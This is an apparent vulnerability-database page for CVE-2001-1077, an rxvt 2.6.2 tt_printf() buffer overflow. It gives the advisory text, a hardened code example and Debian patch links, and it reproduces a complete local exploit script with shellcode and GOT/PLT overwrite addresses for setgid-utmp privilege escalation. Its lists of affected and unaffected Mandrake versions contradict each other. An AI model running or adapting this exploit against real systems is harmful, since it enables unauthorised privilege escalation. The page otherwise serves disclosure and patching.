CVE-2001-1077
CVSS 4.6
Published: 2001-06-15 00:00:00
Revised: 2008-09-10 15:09:37
NMCOES

[Original] Buffer overflow in tt_printf function of rxvt 2.6.2 allows local users to gain privileges via a long (1) -T or (2) -name argument.


[CNNVD] Rxvt Local Buffer Overflow Vulnerability (CNNVD-200106-065)

        CVE(CAN) ID: CAN-2001-1077

        Rxvt is a color VT102 terminal emulator that can be used as a replacement for xterm.

        rxvt contains a buffer overflow vulnerability. Supplying an overly long argument to certain of its command-line options ("-T" or "-name") triggers the overflow. On some systems rxvt is installed setgid utmp, so a local attacker may be able to exploit this vulnerability to obtain utmp group privileges.

        The problematic code is in the tt_printf() function:

        void
        tt_printf(const char *fmt,...)
        {
         int i;
         va_list arg_ptr;
         unsigned char buf[256];

         va_start(arg_ptr, fmt);
         vsprintf(buf, fmt, arg_ptr);   /* unbounded write: formatted output longer than 255 bytes overruns buf */
         va_end(arg_ptr);
         tt_write(buf, strlen(buf));
        }

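The same function rewritten to bound the write, as an added example that is not rxvt's own code: the title given with -T is later echoed back through tt_printf() when the terminal is asked to report it, so the fix is to let vsnprintf() stop at the buffer and to treat truncation as an error rather than sending a partial reply. tt_write() and report_title_of_length() are hypothetical stand-ins written for this example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define TT_BUF 256   /* same size as rxvt's buf[256] above */

/* Hypothetical stand-in for rxvt's tt_write(): instead of writing to the
 * pty, it records what would have been sent so the result can be checked. */
static size_t last_written;
static char   last_buf[TT_BUF];

static void tt_write(const unsigned char *buf, size_t len)
{
    memcpy(last_buf, buf, len);
    last_buf[len] = '\0';
    last_written = len;
}

/* Hardened tt_printf(): vsnprintf() never writes past buf and returns the
 * length the full output would have needed, so truncation is detectable.
 * Returns 0 when the message was sent, -1 when it did not fit (nothing is
 * sent: a partial escape sequence is worse than no reply). */
int tt_printf_safe(const char *fmt, ...)
{
    unsigned char buf[TT_BUF];
    va_list arg_ptr;
    int n;

    va_start(arg_ptr, fmt);
    n = vsnprintf((char *)buf, sizeof buf, fmt, arg_ptr);
    va_end(arg_ptr);

    if (n < 0 || (size_t)n >= sizeof buf)
        return -1;              /* would have overflowed the 256-byte buffer */
    tt_write(buf, (size_t)n);
    return 0;
}

/* Feeds a title of 'len' bytes through the formatter, the way a value taken
 * from -T would be; constructed input for demonstration only. */
int report_title_of_length(size_t len)
{
    char title[1024];
    if (len >= sizeof title)
        len = sizeof title - 1;
    memset(title, 'A', len);
    title[len] = '\0';
    return tt_printf_safe("\033]l%s\033\\", title);   /* 5 bytes of framing around the title */
}
```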

- CVSS (base score)

CVSS score: 4.6 [MEDIUM]
Confidentiality impact: PARTIAL [likely to cause information disclosure]
Integrity impact: PARTIAL [may lead to system files being modified]
Availability impact: PARTIAL [may degrade performance or interrupt access to resources]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1077
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-1077
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200106-065
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/static/6701.php
(VENDOR_ADVISORY)  XF  rxvt-ttprintf-bo(6701)
http://www.securityfocus.com/archive/1/191510
(VENDOR_ADVISORY)  BUGTRAQ  20010615 Rxvt vulnerability
http://www.debian.org/security/2001/dsa-062
(VENDOR_ADVISORY)  DEBIAN  DSA-062
http://download.immunix.org/ImmunixOS/7.0/updates/IMNX-2001-70-028-01
(VENDOR_ADVISORY)  IMMUNIX  IMNX-2001-70-028-01
http://www.linux-mandrake.com/en/security/2001/MDKSA-2001-060.php
(UNKNOWN)  MANDRAKE  MDKSA-2001:060
http://www.securityfocus.com/bid/2878
(UNKNOWN)  BID  2878

- Vulnerability information

Rxvt Local Buffer Overflow Vulnerability
Medium severity, boundary condition error
2001-06-15 00:00:00 2005-10-20 00:00:00
Local

- Advisories and patches

        Workaround:

        We recommend temporarily removing the setuid/setgid bit from rxvt:

        # chmod a-s rxvt

        Vendor patches:

        Debian Linux (http://www.debian.org/security/) has released a security advisory for this issue:

        DSA-062-1 rxvt: buffer overflow
        http://www.debian.org/security/2001/dsa-062

        Patch downloads -
        ________________________________________________________________________

        Debian GNU/Linux 2.2 (potato)

        Source:
        http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2-2.1.diff.gz
        http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2-2.1.dsc
        http://security.debian.org/dists/stable/updates/main/source/rxvt_2.6.2.orig.tar.gz

        Alpha:
        http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt-ml_2.6.2-2.1_alpha.deb
        http://security.debian.org/dists/stable/updates/main/binary-alpha/rxvt_2.6.2-2.1_alpha.deb

        ARM:
        http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt-ml_2.6.2-2.1_arm.deb
        http://security.debian.org/dists/stable/updates/main/binary-arm/rxvt_2.6.2-2.1_arm.deb

        Intel IA-32:
        http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt-ml_2.6.2-2.1_i386.deb
        http://security.debian.org/dists/stable/updates/main/binary-i386/rxvt_2.6.2-2.1_i386.deb

        Motorola 680x0:
        http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt-ml_2.6.2-2.1_m68k.deb
        http://security.debian.org/dists/stable/updates/main/binary-m68k/rxvt_2.6.2-2.1_m68k.deb

        PowerPC:
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt-ml_2.6.2-2.1_powerpc.deb
        http://security.debian.org/dists/stable/updates/main/binary-powerpc/rxvt_2.6.2-2.1_powerpc.deb

        Sun Sparc:
        http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt-ml_2.6.2-2.1_sparc.deb
        http://security.debian.org/dists/stable/updates/main/binary-sparc/rxvt_2.6.2-2.1_sparc.deb

        ________________________________________________________________________


- Vulnerability information (20928)

Rxvt 2.6.1/2.6.2 Buffer Overflow Vulnerability (EDBID:20928)
linux local
2001-06-15 Verified
0 MasterSecuritY
N/A
source: http://www.securityfocus.com/bid/2878/info

Rxvt is a color VT102 terminal emulator for X intended as an xterm(1) replacement.

A buffer overflow vulnerability exists in rxvt.

The error occurs when certain command line options with long arguments are passed to rxvt.

Because rxvt is installed setgid 'utmp' by some system configurations, it may be possible for local users to execute arbitrary code/commands with these privileges.

#!/bin/sh

#
# MasterSecuritY <www.mastersecurity.fr>
#
# xrxvt.sh - Local exploit for xrxvt 2.6.2
# Copyright (C) 2001  Michel "MaXX" Kaempf <maxx@mastersecurity.fr>
# Copyright (C) 2001  Samuel "Zorgon" Dralet <samuel.dralet@mastersecurity.fr>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or (at
# your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

echo "rxvt-2.6.2 exploit for Linux Debian 2.2"
echo "Which target :"
echo -e "\t0. rxvt 2.6.2 (package deb) on Debian 2.2"
echo -e "\t1. rxvt 2.6.2 (tarball) on Debian 2.2"
echo
echo -n "target : "

read TARGET

cat > /tmp/xx.c <<EOF
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int main()
{
        char * p_ttyname;
        char * argv[] = { "/bin/sh", NULL };

        p_ttyname = ttyname( STDERR_FILENO );
        if ( p_ttyname == NULL ) {
                return( -1 );
        }
        if ( open(p_ttyname, O_RDONLY) != STDIN_FILENO ) {
                return( -1 );
        }
        if ( open(p_ttyname, O_WRONLY) != STDOUT_FILENO ) {
                return( -1 );
        }

        execve( argv[0], argv, NULL );
        return( -1 );
}
EOF
gcc -o /tmp/xx /tmp/xx.c
rm -f /tmp/xx.c

cat > /tmp/xrxvt.c << EOF
#include <stdio.h>
#include <stdlib.h>   /* atoi(), malloc(), exit() */
#include <string.h>
#include <unistd.h>
#include <X11/X.h>
#include <X11/Xlib.h>

#define BUF 256 /* buffer size */
#define EBP 4
#define EIP 4
#define ESC 3   /* alignment */

#define GID "\x2b"
#define DISPLAY ":0"
#define STACK ( 0xc0000000 - 4 )

Display *d;

char shellcode[] =
/* setregid( -1, GID ); */
"\x31\xdb\x31\xc9\xbb\xff\xff\xff\xff\xb1"GID"\x31\xc0\xb0\x47\xcd\x80"
/* setregid( GID, GID ); */
"\x31\xdb\x31\xc9\xb3"GID"\xb1"GID"\x31\xc0\xb0\x47\xcd\x80"
/* Aleph One ;) */
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/xx";

struct os
{
    int id;
    char *desc;
    char *path;
    unsigned long plt;
    unsigned long got;
};

struct os target[]=
{
    { 0, "rxvt 2.6.2 (package deb) on Debian 2.2", "/usr/X11R6/bin/rxvt-xterm",
      0x0804add0, 0x0805c964 },
    { 1, "rxvt 2.6.2 (tarball) on Debian 2.2", "/usr/local/bin/rxvt",
      0x0804a690, 0x08059e1c },
    { 2, NULL, 0, 0 }
};

void usage ( char *cmd )
{
    int i;
    fprintf(stderr, "rxvt-2.6.2 exploit for Linux Debian 2.2\n");
    fprintf(stderr, "usage: %s <target>\n",cmd);
    fprintf(stderr, "with target:\n\n");
    for( i = 0; i < sizeof(target) / sizeof(struct os); i++ )
        fprintf(stderr, "%d. %s\n", i, target[i].desc);

    exit( -1 );
}

int main(int argc, char *argv[])
{
    char buffer[ BUF - ESC + EBP + EIP + 12 + 1];
    char * exec_argv[] = { NULL, "-T", buffer, NULL };
    char * envp[] = { shellcode, NULL };
    int i, t;
    char *path;

    if ( argc != 2 )
        usage(argv[0]);

    t = atoi(argv[1]);
    if( t < 0 || t >= sizeof(target) / sizeof(struct os) )
        usage( argv[0] );

    path = (char *)malloc(strlen(target[t].path)+1);
    strcpy(path,target[t].path);

    if ( (d = XOpenDisplay(DISPLAY)) == NULL ){
        fprintf(stderr, "Unable to open display: %s\n", DISPLAY);
        exit(10);
    }

    for ( i = 0; i < BUF - ESC + EBP; i++ ) {
        buffer[ i ] = 'A';
    }

    *( (size_t *) &(buffer[i]) ) = target[t].plt;
    i += sizeof(size_t);
    *( (size_t *) &(buffer[i]) ) = target[t].got + 4;
    i += sizeof(size_t);
    *( (size_t *) &(buffer[i]) ) = target[t].got + 4;
    i += sizeof(size_t);
    *( (size_t *) &(buffer[i]) ) = STACK - (strlen(path) + 1) - sizeof(shellcode);
    i += sizeof(size_t);

    buffer[i] = '\0';

    exec_argv[0] = path;
    execve( exec_argv[0], exec_argv, envp );
    return( -1 );
}
EOF
gcc -o /tmp/xrxvt /tmp/xrxvt.c -lX11
rm -f /tmp/xrxvt.c

echo "Go to rxvt window and type 'echo -ne \"\033[21t\"' ..."
echo "And see ..."
/tmp/xrxvt $TARGET

- Vulnerability information

14142
rxvt tt_printf Function Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

- Timeline

2001-06-15 Unknown
2001-06-15 Unknown

- Solution

Products

Unknown or Incomplete

- References

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Rxvt Buffer Overflow Vulnerability
Boundary Condition Error 2878
No Yes
2001-06-15 12:00:00 2009-07-11 06:56:00
Reported to Bugtraq by Samuel "Zorgon" Dralet <samuel.dralet@mastersecurity.fr> on June 15, 2001.

- Affected program versions

rxvt rxvt 2.6.2
- Debian Linux 2.2 sparc
- Debian Linux 2.2 powerpc
- Debian Linux 2.2 arm
- Debian Linux 2.2 alpha
- Debian Linux 2.2 68k
- Debian Linux 2.2
rxvt rxvt 2.6.1
- Immunix Immunix OS 7.0 beta
- Immunix Immunix OS 7.0
- Immunix Immunix OS 6.2
Mandriva Linux Mandrake 8.0
Mandriva Linux Mandrake 7.2
Mandriva Linux Mandrake 7.1
Mandriva Linux Mandrake 7.0
Mandriva Linux Mandrake 6.1
Mandriva Linux Mandrake 6.0

- Unaffected program versions

Mandriva Linux Mandrake 8.0
Mandriva Linux Mandrake 7.2
Mandriva Linux Mandrake 7.1
Mandriva Linux Mandrake 7.0
Mandriva Linux Mandrake 6.1
Mandriva Linux Mandrake 6.0

- Vulnerability discussion


- Exploit

Samuel "Zorgon" Dralet <samuel.dralet@mastersecurity.fr> has made an exploit available:

- Solution

Vendor updates that rectify this issue are available:


rxvt rxvt 2.6.1

rxvt rxvt 2.6.2

- References

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's related websites